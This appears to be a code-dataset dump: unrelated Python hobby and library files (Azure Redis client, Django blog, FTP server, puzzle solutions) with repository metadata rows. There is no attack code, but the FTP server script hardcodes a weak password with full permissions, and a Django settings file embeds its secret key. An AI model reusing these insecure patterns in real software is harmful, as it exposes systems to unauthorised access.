# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def import_method(
self, resource_group_name, name, files, format=None, custom_headers=None, raw=False, **operation_config):
"""Import data into redis cache.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param files: files to import
:type files: list of str
:param format: File format.
:type format: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.ImportRDBParameters(format=format, files=files)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}/import'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ImportRDBParameters')
# Construct and send request
def long_running_send():
request = self._client.post(url, query_parameters)
return self._client.send(
request, header_parameters, body_content, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def export(
self, resource_group_name, name, parameters, custom_headers=None, raw=False, **operation_config):
"""Import data into redis cache.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param parameters: Parameters for redis export operation.
:type parameters: :class:`ExportRDBParameters
<azure.mgmt.redis.models.ExportRDBParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}/export'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ExportRDBParameters')
# Construct and send request
def long_running_send():
request = self._client.post(url, query_parameters)
return self._client.send(
request, header_parameters, body_content, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
|
[
"admin@example.com"
] |
admin@example.com
|
52c6be96fc5d3a791c96d286c9fc69b887c703e3
|
62d64a7422cd9802dd4bb9d308f14dce6d3468a0
|
/Base/BaseFile.py
|
3c6d1555955429ce4442a25ad6d3e0417ff207cc
|
[] |
no_license
|
ruby1045/vboardAutoTest
|
de3798c0828cf51f2f9e043a7b402f23c31752dc
|
de8a89bab13905b43bc9d7971d1576dab641c30d
|
refs/heads/master
| 2020-03-18T11:46:50.467592
| 2018-05-29T07:59:29
| 2018-05-29T07:59:29
| 134,690,857
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
__author__ = 'vBoardTester'
import os
'''
操作文件
'''
def write_data(f, method='w+', data=""):
if not os.path.isfile(f):
print('文件不存在,写入数据失败')
else:
with open(f, method, encoding="utf-8") as fs:
fs.write(data + "\n")
def mkdir_file(f, method='w+'):
if not os.path.isfile(f):
with open(f, method, encoding="utf-8") as fs:
print("创建文件%s成功" % f)
pass
else:
print("%s文件已经存在,创建失败" % f)
pass
def remove_file(f):
if os.path.isfile(f):
os.remove(f)
else:
print("%s文件不存在,无法删除" % f)
|
[
"ruby1045@163.com"
] |
ruby1045@163.com
|
a22a66cf39f2a58463446a3541d9c9859761d617
|
69b93223fc6794123269022a02e5a1dcf130e698
|
/121_Best_Time_to_Buy_and_Sell_Stock.py
|
4d71cc2baeef778bf9fc8bc85c27e8cf66d6a37d
|
[] |
no_license
|
GuangyuZheng/leet_code_python
|
43b984ce98cc889a7e07151004d347cb03b2d9b2
|
266def94df8245f90ea5b6885fc472470b189e51
|
refs/heads/master
| 2020-09-05T18:12:07.649374
| 2020-02-22T09:37:59
| 2020-02-22T09:37:59
| 220,177,486
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 368
|
py
|
from typing import List
class Solution:
def maxProfit(self, prices: List[int]) -> int:
if len(prices) == 0:
return 0
min_price = prices[0]
m_profit = 0
for i in range(1, len(prices)):
min_price = min(min_price, prices[i])
m_profit = max(m_profit, prices[i] - min_price)
return m_profit
|
[
"583621555@qq.com"
] |
583621555@qq.com
|
999da581a075c68eddb6c496ad7f6ce41d8f5236
|
46577f70342ef2cf811bcfc3756e1238482f8b3c
|
/blog/models.py
|
0231f1cbb1f9f638bf0952b18ec317bdb75e2848
|
[] |
no_license
|
13114848878/MyBlog
|
f3b4a38cceecdae7f761514e4ec452ba9dd41b90
|
f7ebfc47f9a5382d9dd7ff93157d0bddcafa4056
|
refs/heads/master
| 2020-08-06T20:12:55.399606
| 2019-10-13T14:11:08
| 2019-10-13T14:11:08
| 213,138,175
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,605
|
py
|
# coding:utf-8
from django.db import models
#导入Django自带用户模块
from django.contrib.auth.models import User
# 载入富文本类
from DjangoUeditor.models import UEditorField
from mdeditor.fields import MDTextField
# Create your models here.
class Category(models.Model):
"""
文章分类表
"""
name = models.CharField('分类', max_length=100)
index = models.IntegerField(default=999, verbose_name='分类排序')
class Meta:
verbose_name = '分类'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Tag(models.Model):
"""
文章标签表
"""
name = models.CharField('标签', max_length=30)
class Meta:
verbose_name = '标签'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Tui(models.Model):
"""
推荐表
"""
name = models.CharField('推荐', max_length=30)
class Meta:
verbose_name = '推荐'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Banner(models.Model):
"""
幻灯图片
"""
text_info = models.CharField('图片信息', max_length=100, default='')
img = models.ImageField('轮播图', upload_to='banner/')
link_url = models.URLField('图片链接', max_length=100)
is_active = models.BooleanField('是否激活', default=False)
def __str__(self):
return self.text_info
class Meta:
verbose_name = '轮播图'
verbose_name_plural = verbose_name
class Link(models.Model):
"""
友情链接表
"""
name = models.CharField('链接名称',max_length=70)
link_url = models.URLField(max_length=100)
def __str__(self):
return self.name
class Meta:
verbose_name = '友情链接'
verbose_name_plural = verbose_name
class Article(models.Model):
title = models.CharField(verbose_name='标题', max_length=100)
excerpt = models.TextField(verbose_name='摘要', max_length=256, blank=True)
#使用外键关联分类表与分类是一对多关系
category = models.ForeignKey(Category, on_delete=models.CASCADE,
verbose_name='分类', blank=True, null=True)
#使用外键关联标签表与标签是多对多关系
tags = models.ManyToManyField(Tag, verbose_name='标签', blank=True,)
img = models.ImageField(upload_to='article_img/%Y/%m/%d/',
verbose_name='文章封面图片', blank=True, null=True)
# body = models.TextField(verbose_name='文章内容')
# 替换成富文本。
# imagePath="upimg/", filePath="upfile/"
# 这两个是图片和文件上传的路径,我们上传文件,
# 会自动上传到项目根目录media文件夹下对应的upimg和upfile目录里
#
# body = UEditorField('内容', width=800, height=500,
# toolbars="full", imagePath="upimg/", filePath="upfile/",
# upload_settings={"imageMaxSize": 1204000},
# settings={}, command=None, blank=True,
# )
#
# 使用MarkDown富文本
body = MDTextField(verbose_name='文章内容')
"""
文章作者,这里User是从django.contrib.auth.models导入的。
这里我们通过 ForeignKey 把文章和 User 关联了起来。
"""
user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name='作者')
views = models.PositiveIntegerField(verbose_name='阅读量', default=0)
tui = models.ForeignKey(Tui, on_delete=models.DO_NOTHING,
verbose_name='推荐位', blank=True, null=True)
created_time = models.DateTimeField(verbose_name='发布时间', auto_now_add=True)
modified_time = models.DateTimeField(verbose_name='修改时间', auto_now=True)
class Meta:
verbose_name = '文章'
verbose_name_plural = '文章'
def __str__(self):
return self.title
|
[
"414319563@qq.com"
] |
414319563@qq.com
|
be02581c2e1ff9d55f4f09c85e9cf109f689ea46
|
cae10699b3deab7910e3df2b572a734387a32be6
|
/airtable_manager.py
|
3d6808d73541659a76442348b158e297bac374bf
|
[] |
no_license
|
sjhangiani12/connect
|
2df7d94125c297e0259f816a19afc6feee3af768
|
7eebebe69d49f9acc88c7701a53402f151ce986a
|
refs/heads/master
| 2022-12-18T00:48:56.112166
| 2020-08-23T19:47:46
| 2020-08-23T19:47:46
| 289,675,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,030
|
py
|
# from airtable get next name + source that is not muted.
# Take earliest date and if tied take random from remaining.
from airtable import Airtable
from keys import airtable_api_key, airtable_base_key
from datetime import datetime
airtable_obj = Airtable(base_key=airtable_base_key, table_name="contacts", api_key=airtable_api_key)
def get_friend():
for page in airtable_obj.get_iter(max_records=1, view="priority_queue"):
for record in page:
user_records = record
user_id = user_records["id"]
friend_id = user_id
friend_name = user_records["fields"]["name"]
friend_source = user_records["fields"]["source"]
return friend_id, friend_name, friend_source
def update_considering(friend_id, indicator):
update_dict = {"in_consideration": indicator}
airtable_obj.update(friend_id, update_dict)
print("marked as considering")
def get_considered():
for page in airtable_obj.get_iter(max_records=1, view="in_consideration"):
for record in page:
user_records = record
user_id = user_records["id"]
friend_id = user_id
friend_name = user_records["fields"]["name"]
friend_source = user_records["fields"]["source"]
return friend_id, friend_name, friend_source
def mark_as_skipped(friend_id):
update_dict = {"last_skipped": datetime.today().strftime("%Y-%m-%d")}
airtable_obj.update(friend_id, update_dict)
print("marked as skip")
def mute_person(friend_id):
update_dict = {"muted": True}
airtable_obj.update(friend_id, update_dict)
print("muted")
# did you talk to this person
# - get some response and input that as True for False
def mark_as_talked(friend_id, follow_up_val):
update_dict = {"follow_up": follow_up_val}
if follow_up_val:
update_dict = {"follow_up": follow_up_val,
"last_contact": datetime.today().strftime("%Y-%m-%d")}
airtable_obj.update(friend_id, update_dict)
print("marked date of convo")
|
[
"sjhangiani12@users.noreply.github.com"
] |
sjhangiani12@users.noreply.github.com
|
e9cba56d2439c33370a96611cdacbc6c7a3451fc
|
a91dc355662617269d90efdadc1c3d9cf3220f57
|
/CodeHS/2/17/5/Happy-Sad-Face-Travis.py
|
062a0836bfdb7ca718dbbc9378fc9066a4ed2411
|
[] |
no_license
|
CRTC-Computer-Engineering/CRTC-Python-Examples
|
112adbbe73f7841acb077153c454f06dec46c1e2
|
ae94d792cc5f5ba23c4a7356a02f85800d0c9c7e
|
refs/heads/master
| 2020-08-31T19:10:16.719526
| 2019-11-22T19:17:43
| 2019-11-22T19:17:43
| 218,763,254
| 2
| 1
| null | 2019-11-22T19:17:44
| 2019-10-31T12:41:58
|
Python
|
UTF-8
|
Python
| false
| false
| 923
|
py
|
speed(0)
penup()
pensize(10)
happy=input("Are you happy? (yes,no): ")
## Make a smile based on 0,0
def make_smile():
setposition(0,-70)
color("black")
pendown()
circle(60,90)
color("yellow")
circle(60,180)
color("black")
circle(60,90)
penup()
## Make a frown based on 0,0
def make_frown():
penup()
setposition(0,-120)
circle(60,90)
color("black")
pendown()
circle(60,180)
penup()
## Makes a circle and fills it
def make_eye():
color("black")
pendown()
begin_fill()
circle(20)
end_fill()
penup()
## navigation
setposition(0,-100)
color("yellow")
pendown()
begin_fill()
circle(100)
end_fill()
penup()
## Code branches to see if `happy` or `sad`
if happy == "yes":
make_smile()
elif happy == "no":
make_frown()
penup()
setposition(0,0)
left(90)
## Final Navigation
setposition(-30,25)
make_eye()
forward(70)
make_eye()
|
[
"travbuttons34@gmail.com"
] |
travbuttons34@gmail.com
|
12dfbcfb707df5b7be2620a8f2e84adc58652615
|
04333bf8cdf31ad8004283d9414d8b7947154808
|
/python/p029.py
|
440efdb56e2c155591c992ec87250d1074d4c54c
|
[] |
no_license
|
davidroeca/ProjectEuler
|
3868d7c4172a63fc83b04f95323962a005b34848
|
79cfa9041561edb0ac2ce258b8d6e224ecd1cfe0
|
refs/heads/master
| 2021-03-12T20:30:31.625852
| 2016-10-03T13:11:20
| 2016-10-03T13:11:20
| 41,495,588
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 908
|
py
|
"""
Problem 29:
Consider all integer combinations of ab for 2 <= a <= 5 and 2 <= b <= 5:
2^2=4, 2^3=8, 2^4=16, 2^5=32
32=9, 33=27, 3^4=81, 3^5=243
42=16, 43=64, 44=256, 45=1024
52=25, 53=125, 54=625, 55=3125
If they are then placed in numerical order, with any repeats removed, we get the
following sequence of 15 distinct terms:
4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125
How many distinct terms are in the sequence generated by a^b for 2 <= a <= 100
and 2 <= b <= 100?
"""
def unique_list(iterable):
return list(set(iterable))
def get_n_unique_terms(iterable):
return len(unique_list(iterable))
def a_pow_b_gen(min_a=2, max_a=100, min_b=2, max_b=100):
for a in range(min_a, max_a + 1):
for b in range(min_b, max_b + 1):
yield a ** b
def main():
print(get_n_unique_terms(a_pow_b_gen()))
if __name__ == "__main__":
main()
|
[
"david.roeca@gmail.com"
] |
david.roeca@gmail.com
|
9fb8ae8cb045e3f1e064f53ba7ed14a4c060d7b7
|
a1301fc01f98b5033f604cc564d73b97788e4ba9
|
/server.py
|
b2e633b6f90cf6336369b971739e41f586b219ed
|
[] |
no_license
|
stannumm/Basic-FTP-Project-
|
74f6cd1a11abe232ddc7f39426e704601b32674c
|
b250be2df6457170b7fe4d27e4f89b83b619e287
|
refs/heads/master
| 2020-03-06T23:12:45.323725
| 2018-03-28T11:04:19
| 2018-03-28T11:04:19
| 127,126,689
| 0
| 0
| null | null | null | null |
ISO-8859-9
|
Python
| false
| false
| 471
|
py
|
#server scripti
# alındığı site : https://pypi.python.org/pypi/pyftpdlib/
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
authorizer = DummyAuthorizer()
authorizer.add_user("user", "12345", "C:/Users/ahmet/Desktop/FTP", perm="elradfmwMT")
handler = FTPHandler
handler.authorizer = authorizer
server = FTPServer(("127.0.0.1", 21), handler)
server.serve_forever()
|
[
"noreply@github.com"
] |
stannumm.noreply@github.com
|
b032f4d5282db47874e320529199a0252434e484
|
efe5a8bb255d6084c13166f88611250780f7eaf7
|
/daiyeDRF2/settings.py
|
170641aab888f46c4576bc83d577d0a9ad888e7a
|
[] |
no_license
|
daiyeyue/daiyeDRF2
|
18c9cd413653e158f1d6ce6899f0db2b9202a78d
|
60ad6740845be973aee18b492861775fe8e0c1a9
|
refs/heads/master
| 2020-12-05T08:23:55.994814
| 2020-01-06T08:32:38
| 2020-01-06T08:32:38
| 232,057,475
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,207
|
py
|
"""
Django settings for daiyeDRF2 project.
Generated by 'django-admin startproject' using Django 1.11.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$qu+0c-!t!vl2$)1o!q8sy3mr8)^#rts&8i6cu=4(x)aky)y5y'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework', # DRF需要的框架
'MySer',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'daiyeDRF2.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'daiyeDRF2.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
|
[
"150064328@qq.com"
] |
150064328@qq.com
|
47f9389ada1870d5ca97262115373be7f96efac5
|
d7ef079b36a0a6cd0b72fd8358c3ccd8865ed9f1
|
/eggs/z3c.unconfigure-1.0.1-py2.7.egg/z3c/unconfigure/config.py
|
bb7066970dba456707213c58ca7b6252574ed42e
|
[] |
no_license
|
vcabral19/productsgovit
|
8e7d104645d9c49b6502a44c640c7fef11bbb9fb
|
1a1f7321573d031e872a358f4c3510af2c05564d
|
refs/heads/master
| 2020-06-21T16:33:46.235438
| 2016-11-28T18:12:24
| 2016-11-28T18:12:24
| 74,784,667
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,143
|
py
|
##############################################################################
#
# Copyright (c) 2008 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""The 'unconfigure' grouping directive
"""
from zope.configuration import config
from zope.configuration.interfaces import IConfigurationContext
from zope.configuration.zopeconfigure import ZopeConfigure
from zope.security import adapter
import zope.component.zcml
def groupingDirectiveAllNS(_context, name, schema, handler,
usedIn=IConfigurationContext):
"""Registers a grouping directive with all namespaces.
"""
config.defineGroupingDirective(_context, name, schema, handler,
namespace="*", usedIn=usedIn)
def is_subscriber(discriminator, callable=None, args=(), kw={},
includepath=(), info='', order=0):
"""Determines whether the action has been emitted from the
<subscriber /> directive.
"""
return (discriminator is None and
callable is zope.component.zcml.handler and
args[0] == 'registerHandler')
def real_subscriber_factory(discriminator, callable=None, args=(), kw={},
includepath=(), info='', order=0):
"""Returns the real subscriber factory[#] and type of even that
the subscriber is registered for ('for' parameter).
This function assumes that the action in question is a subscriber
action. In other words, is_subscriber(*args) is True.
[#] Under certain circumstances, <subscriber /> wraps factories in
some security- or location-related adapter factory.
"""
factory = args[1]
for_ = args[2]
if isinstance(factory, (adapter.LocatingTrustedAdapterFactory,
adapter.LocatingUntrustedAdapterFactory,
adapter.TrustedAdapterFactory)):
factory = factory.factory
return factory, for_
class Unconfigure(ZopeConfigure):
def __init__(self, context, **kw):
super(Unconfigure, self).__init__(context, **kw)
# Make a new actions list here. This will shadow
# context.actions which would otherwise be "inherited" by our
# superclass's __getattr__. By shadowing the original list,
# all actions within 'unconfigure' will be added to this list
# here, not the global actions list.
self.actions = []
def after(self):
# Get a discriminator -> action representation of all the
# actions that have been churned out so far.
unique = dict((action[0], action) for action in self.context.actions
if action[0] is not None)
# Special-case subscriber actions: Find all subscriber actions
# and store them as (factory, for) -> action. They're a
# special case because their discriminators are None, so we
# can't pull the same trick as with other directives.
subscribers = dict((real_subscriber_factory(*action), action)
for action in self.context.actions
if is_subscriber(*action))
# Now let's go through the actions within 'unconfigure' and
# use their discriminator to remove the real actions
for unaction in self.actions:
# Special-case subscriber actions.
if is_subscriber(*unaction):
factory, for_ = real_subscriber_factory(*unaction)
action = subscribers.get((factory, for_))
if action is None:
continue
self.remove_action(action)
del subscribers[(factory, for_)]
# Generic from here
discriminator = unaction[0]
if discriminator is None:
continue
action = unique.get(discriminator)
if action is None:
# Trying to unconfigure something that hasn't been
# configured in the first place. Ignore.
continue
self.remove_action(action)
del unique[discriminator]
def remove_action(self, action):
# We can't actually remove actions because we mustn't change
# the length of the actions list. The main reason is that
# includeOverrides relies on the length of the action list
# (and we could easily be included via includeOverrides and
# therefore run into this problem). So let's simply replace
# actions with a null value. Actions whose callable is None
# won't be executed.
i = self.context.actions.index(action)
self.context.actions[i] = (None, None)
|
[
"d828642@rede.sp"
] |
d828642@rede.sp
|
f25ec0e958173dc21a1bdf6a34fbd52f0fc929f1
|
ea871b12cdb62a73933200935a7e278738b358dd
|
/Misc_notUsed/rhymeCrawler.py
|
f2eebfd14911e480769aab4251153e4b06d4e494
|
[] |
no_license
|
wouterbeek/EAPoem
|
497ad12d19a8d078e43e28876a380ebcfffc3c08
|
e417a8bed409e6f52a2139c58116fe78a5ad8a23
|
refs/heads/master
| 2016-09-06T10:36:07.709562
| 2013-12-16T22:10:58
| 2013-12-16T22:10:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 933
|
py
|
"""
Crawler to fine rhyming words on http://rhymezone.com
Author: Eszter Fodor
Version: 05/2013
!!! NOTE: Uncomplete !!!
"""
# regex: <a class="d" href="d=*"> ... </a> || <a href="d=*"> ... </a>
import sys
import mechanize
import re
from BeautifulSoup import BeautifulSoup
from HTMLParser import HTMLParser
def getRhymes(html):
"""
Constructs list with all the words that came up on the site
"""
soup = BeautifulSoup(html)
find = soup.body.center.center
b = find.findAll('a', href = True,text=True)
print b
#rhymes = find.findAll('a', href = True)
#print rhymes
def main(args):
"""
Program entry point
Argument: word to look up
"""
word = args[1]
br = mechanize.Browser()
link = ('http://www.rhymezone.com/r/rhyme.cgi?Word=%s&typeofrhyme=perfect&org1=syl&org2=l&org3=y' % word)
site = br.open(link)
html = site.read()
getRhymes(html)
site.close()
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
[
"chytos@gmail.com"
] |
chytos@gmail.com
|
4aab624853ef559de8b4f8f88e3f5657bff877c9
|
b4de9949124a85d54844a69920a65172b4188067
|
/lat_lon_script.py
|
ac9e5a4ae11f0420a89b35b4ca8da9f56f98f4f5
|
[
"BSD-3-Clause"
] |
permissive
|
schrma/influxdb
|
e70c5188f36fd1ae8bc05f407fcf025f4a63d905
|
23fb18b1efcaa4bd9c7d214bc9f5fd3120bd5ba1
|
refs/heads/master
| 2020-09-07T13:27:13.787912
| 2019-11-13T17:12:58
| 2019-11-13T17:12:58
| 220,795,349
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 991
|
py
|
#!/usr/bin/python3
import sys
import argparse
import influxhandler
def main(argv):
args = parse_arguments(argv)
influx_client = influxhandler.InfluxHandler("localhost:8086","admin",args.password,"openhab_db")
influx_client.write_lat_lon(args.lat,args.lon,args.measurement)
def parse_arguments(command_args):
"""parse the input arguments """
my_description = 'Cmd write lat and lon to database'
parser = argparse.ArgumentParser(description=my_description, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-l', '--lat', dest='lat',help='Write latitude to influxdb')
parser.add_argument('-g', '--lon', dest='lon',help='Write longitude to influxdb')
parser.add_argument('-p', '--password', dest='password',help='Password for influxdb')
parser.add_argument('-m', '--measurement', dest='measurement',help='Measurement name')
args = parser.parse_args(command_args)
return args
if __name__ == "__main__":
main(sys.argv[1:])
|
[
"marcoschr@gmx.de"
] |
marcoschr@gmx.de
|
18b1dcd136b7ca1e094b360efaf4861250250a30
|
fcdbf04f899eabff6906099090447255c97628b8
|
/db.py
|
11a0fa355290675be0718b1b2a4bf9582e687cd1
|
[] |
no_license
|
mehulved/flask-tutorial
|
3d6e60a846a8441c37414247e48ee904432e6b14
|
3b2eb422a7012cacfd320bd510766fedfd120fbc
|
refs/heads/master
| 2021-01-16T19:28:45.338531
| 2012-12-08T14:10:19
| 2012-12-08T14:23:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
from flask.ext.sqlalchemy import SQLAlchemy
# Create the SQLAlchemy object, provided by Flask-SQLALchemy.
db = SQLAlchemy()
|
[
"dhruvbaldawa@gmail.com"
] |
dhruvbaldawa@gmail.com
|
ffcb4231b6956ab6788073b7baa2a68f6163136e
|
eefc46faf29b7ec9e52de065a983f9993de4aaa3
|
/tic_tac_toe/migrations/0001_initial.py
|
3c97744c1bc95ec95e5322f7be5622d004c103a7
|
[
"MIT"
] |
permissive
|
jujuwoman/tic-tac-toe
|
0963acd74bb6c31b6fabc67ffce5babc128d8b79
|
6096d980d0253a9fab9293dda37b7d12b7cb4613
|
refs/heads/master
| 2022-11-16T07:19:17.526463
| 2020-07-04T18:59:43
| 2020-07-04T18:59:43
| 276,934,778
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,958
|
py
|
# Generated by Django 3.0.3 on 2020-02-24 04:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Marks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Players',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Roster',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Stats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('wins', models.IntegerField()),
('losses', models.IntegerField()),
('draws', models.IntegerField()),
('roster', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tic_tac_toe.Roster')),
],
),
migrations.CreateModel(
name='GameState',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('turn', models.BooleanField()),
('roster', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tic_tac_toe.Roster')),
],
),
]
|
[
"judywang@linkedin.com"
] |
judywang@linkedin.com
|
26250ffca25419ec796bc3e537756bfa5e04ec05
|
28aed3120411fd7558fc08b47274f5ced5d5069c
|
/UIAutomation/Page/Mobile/CardCentralPage.py
|
14b6290fe4e1495540274f5aa23a976ae8e6ada8
|
[
"MIT"
] |
permissive
|
SirCYong/long_long_ago
|
8e181310267836774b50824e873adb7959f80080
|
